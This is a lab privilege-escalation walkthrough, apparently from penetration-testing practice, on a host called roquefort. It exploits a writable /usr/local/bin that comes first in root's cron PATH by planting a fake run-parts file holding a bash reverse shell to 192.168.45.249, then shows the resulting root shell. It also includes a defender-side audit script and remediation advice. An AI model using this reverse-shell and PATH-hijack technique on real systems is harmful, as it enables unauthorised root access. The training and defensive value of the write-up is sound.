Writable PATH Variable


It has been identified that the current user, chloe, has write access to a directory on the system's PATH.

chloe@roquefort:/$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

gitea is the only binary present in the /usr/local/bin/ directory, which is the writable one.

SUID


chloe@roquefort:/usr/local/bin$ find / -perm -04000 -ls -type f 2>/dev/null
   786528     32 -rwsr-xr-x   1 root     root        31720 Mar  7  2018 /bin/umount
   786477     32 -rwsr-xr-x   1 root     root        30800 Aug 21  2018 /bin/fusermount
   786624     60 -rwsr-xr-x   1 root     root        61240 Nov 10  2016 /bin/ping
   786527     44 -rwsr-xr-x   1 root     root        44304 Mar  7  2018 /bin/mount
   786525     40 -rwsr-xr-x   1 root     root        40536 May 17  2017 /bin/su
   265086     40 -rwsr-xr-x   1 root     root        40312 May 17  2017 /usr/bin/newgrp
   262222     40 -rwsr-xr-x   1 root     root        40504 May 17  2017 /usr/bin/chsh
   262224     76 -rwsr-xr-x   1 root     root        75792 May 17  2017 /usr/bin/gpasswd
   262221     52 -rwsr-xr-x   1 root     root        50040 May 17  2017 /usr/bin/chfn
   262225     60 -rwsr-xr-x   1 root     root        59680 May 17  2017 /usr/bin/passwd
   394506     12 -rwsr-xr-x   1 root     root        10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   399975    432 -rwsr-xr-x   1 root     root       440728 Jul 15  2019 /usr/lib/openssh/ssh-keysign
   397132     44 -rwsr-xr--   1 root     messagebus    42992 Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

None of these SUID binaries appear to be of any use in combination with the writable PATH directory.

Cron


chloe@roquefort:/usr/local/bin$ cat /etc/crontab | grep -v '^#'
 
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 
*/5 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

But there is a default cronjob running as root with an interval of 5 minutes, and the crontab's own PATH lists /usr/local/bin before /bin. This could be leveraged:

*/5 * * * * root cd / && run-parts --report /etc/cron.hourly

run-parts


chloe@roquefort:/usr/local/bin$ which run-parts
/bin/run-parts

The run-parts binary resolves to /bin/run-parts, and /bin sits after /usr/local/bin in the cron PATH.

chloe@roquefort:/usr/local/bin$ echo 'bash -c "bash -i >& /dev/tcp/192.168.45.249/21 0>&1"' > run-parts 

Because /usr/local/bin precedes /bin in that PATH, a run-parts script placed in the writable /usr/local/bin directory takes priority: when the cron job fires, the shell resolves run-parts to the planted file instead of /bin/run-parts.
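The weakness here is a cron PATH whose early entries are writable by a non-root user, so that a job's command name can be shadowed. The following audit script is an added example written for this write-up, not part of the original notes or of the roquefort target: it walks a PATH string the way cron's /bin/sh would, reports entries that are group- or world-writable (or missing), and checks whether a given command's first hit is the expected system copy. The crontab PATH and the run-parts/bin pairing are taken from the output above; everything else (function names, the --audit flag) is this example's own.

```shell
#!/bin/sh
# Defender-side audit of the PATH that cron hands to its jobs.
# Added example for this write-up; assumes a POSIX sh with ls/cut/tr/head.

# Report PATH entries that are group- or world-writable, or that do not
# exist at all (a missing entry can be created by whoever owns its parent).
path_writable_dirs() {
    printf '%s\n' "$1" | tr ':' '\n' | while IFS= read -r d; do
        [ -n "$d" ] || continue
        if [ ! -d "$d" ]; then
            printf 'MISSING %s\n' "$d"
            continue
        fi
        mode=$(ls -ld "$d" | cut -c1-10)
        # characters 6 and 9 of the mode string are the group/other write bits
        case "$mode" in
            ?????w????|????????w?) printf 'WRITABLE %s (%s)\n' "$d" "$mode" ;;
        esac
    done
}

# List every PATH directory holding a file named $1, in lookup order.
# The first line is what cron would execute; later lines are shadowed copies.
path_hits() {
    name="$1"
    printf '%s\n' "$2" | tr ':' '\n' | while IFS= read -r d; do
        [ -n "$d" ] || continue
        if [ -e "$d/$name" ]; then
            printf '%s/%s\n' "$d" "$name"
        fi
    done
}

# Flag a command whose first PATH hit is not the expected system copy.
# Prints OK / SHADOWED / MISSING and returns 0 / 1 / 2 respectively.
check_shadow() {
    name="$1"; expected="$2"; searchpath="$3"
    first=$(path_hits "$name" "$searchpath" | head -n 1)
    if [ -z "$first" ]; then
        printf 'MISSING %s\n' "$name"
        return 2
    fi
    if [ "$first" = "$expected" ]; then
        printf 'OK %s\n' "$first"
        return 0
    fi
    printf 'SHADOWED %s (expected %s)\n' "$first" "$expected"
    return 1
}

# Crontab PATH from the write-up; run "sh audit.sh --audit" on the host
# to see which entries are writable and which binary run-parts resolves to.
CRON_PATH='/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin'
if [ "${1:-}" = "--audit" ]; then
    path_writable_dirs "$CRON_PATH"
    check_shadow run-parts /bin/run-parts "$CRON_PATH"
fi
```

On the roquefort host the audit would print a WRITABLE line for /usr/local/bin and, once the planted file exists, SHADOWED /usr/local/bin/run-parts. The fix on the defending side is the same either way: make every directory on the cron PATH root-owned and non-writable (or drop /usr/local/* from the crontab PATH), and reference job binaries by absolute path.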

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/roquefort/loot]
└─$ nnc 21
listening on [any] 21 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.206.67] 53696
bash: cannot set terminal process group (1437): Inappropriate ioctl for device
bash: no job control in this shell
root@roquefort:/# whoami
whoami
root
root@roquefort:/# hostname
hostname
roquefort
root@roquefort:/# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:5c:28 brd ff:ff:ff:ff:ff:ff
    inet 192.168.206.67/24 brd 192.168.206.255 scope global ens192
       valid_lft forever preferred_lft forever

System level compromise